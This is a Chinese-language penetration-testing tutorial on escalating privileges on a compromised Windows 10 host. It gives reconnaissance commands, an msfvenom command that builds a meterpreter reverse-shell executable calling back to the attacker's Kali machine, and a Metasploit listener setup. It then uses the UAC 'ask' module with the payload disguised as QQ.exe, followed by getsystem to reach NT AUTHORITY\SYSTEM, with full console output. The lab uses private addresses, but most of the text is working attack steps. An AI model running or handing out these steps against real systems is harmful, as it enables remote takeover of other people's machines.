Windows提权

前言

在利用web漏洞拿下一台服务器主机后，由于权限很低，一般需要提权，这篇文章主要针对Windows。

Windows中的权限

主要是有三个：

-system
	- administrator
		- users

我们默认都是用户权限

基础的信息搜集

此时可以先通过蚁剑的虚拟终端来进行一波信息搜集

# 获取系统版本信息
systeminfo | findstr OS
# 获取主机名称
hostname
# 获取当前用户的安全特权
whoami /priv
# 获取用户的状态
query user 用户名
# 寻找指定端口是否开放
netstat -ano | findstr 3389
# 分析安装的杀软
dir c:\programdata
# 获取远程连接端口
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber

创建环境

先在kali自带的metasploit中生成一个exe木马，这里我用的版本是win10，防火墙全关。

win10：10.211.55.4
kali：10.211.55.5

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.211.55.5 LPORT=4444 -f exe -o shell.exe

然后再在kali中设置监听

┌──(root💀web)-[~]
└─# msfconsole                                                                                                         127 ⨯
                                                  
                                   ____________
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $a,        |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]                                              
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $S`?a,     |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]                                              
 [%%%%%%%%%%%%%%%%%%%%__%%%%%%%%%%|       `?a, |%%%%%%%%__%%%%%%%%%__%%__ %%%%]                                              
 [% .--------..-----.|  |_ .---.-.|       .,a$%|.-----.|  |.-----.|__||  |_ %%]                                              
 [% |        ||  -__||   _||  _  ||  ,,aS$""`  ||  _  ||  ||  _  ||  ||   _|%%]                                              
 [% |__|__|__||_____||____||___._||%$P"`       ||   __||__||_____||__||____|%%]                                              
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| `"a,       ||__|%%%%%%%%%%%%%%%%%%%%%%%%%%]                                              
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%|____`"a,$$__|%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]                                              
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%        `"$   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]                                              
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]                                              
                                                                                                                             

       =[ metasploit v6.0.56-dev                          ]
+ -- --=[ 2154 exploits - 1146 auxiliary - 367 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 8 evasion                                       ]

Metasploit tip: Adapter names can be used for IP params 
set LHOST eth0

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp

msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp

msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf6 exploit(multi/handler) > set LHOST 10.211.55.5
LHOST => 10.211.55.5
msf6 exploit(multi/handler) > EXPLOIT
[-] Unknown command: EXPLOIT
msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.211.55.5:4444 
[*] Sending stage (175174 bytes) to 10.211.55.4
[*] Sending stage (175174 bytes) to 10.211.55.4
[*] Meterpreter session 2 opened (10.211.55.5:4444 -> 10.211.55.4:51055) at 2021-08-18 15:31:59 +0800
[*] Meterpreter session 1 opened (10.211.55.5:4444 -> 10.211.55.4:51146) at 2021-08-18 15:31:59 +0800

然后将生成的木马放到win10中，并点击，来模拟通过web漏洞拿下的主机。

getsystem提权

meterpreter > getsystem

直接输入即可，但是不能100%成功，这里失败了

ask模块提权

msf6 exploit(multi/handler) > use exploit/windows/local/ask 
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ask) > info

       Name: Windows Escalate UAC Execute RunAs
     Module: exploit/windows/local/ask
   Platform: Windows
       Arch: 
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2012-01-03

Provided by:
  mubix <mubix@hak5.org>
  b00stfr3ak

Available targets:
  Id  Name
  --  ----
  0   Windows

Check supported:
  No

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  FILENAME                    no        File name on disk
  PATH                        no        Location on disk, %TEMP% used if not set
  SESSION                     yes       The session to run this module on.
  TECHNIQUE  EXE              yes       Technique to use (Accepted: PSH, EXE)

Payload information:

Description:
  This module will attempt to elevate execution level using the 
  ShellExecute undocumented RunAs flag to bypass low UAC settings.

msf6 exploit(windows/local/ask) > set SESSION 1
SESSION => 1
msf6 exploit(windows/local/ask) > set filename QQ.exe
filename => QQ.exe
msf6 exploit(windows/local/ask) > exploit

[*] Started reverse TCP handler on 10.211.55.5:4444 
[*] UAC is Enabled, checking level...
[*] The user will be prompted, wait for them to click 'Ok'
[*] Uploading QQ.exe - 73802 bytes to the filesystem...
[*] Executing Command!
[*] Sending stage (175174 bytes) to 10.211.55.4
[*] Meterpreter session 3 opened (10.211.55.5:4444 -> 10.211.55.4:51150) at 2021-08-18 15:39:03 +0800

这时权限已经被提升到管理员，再使用getsystem，发现成功得到system权限

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM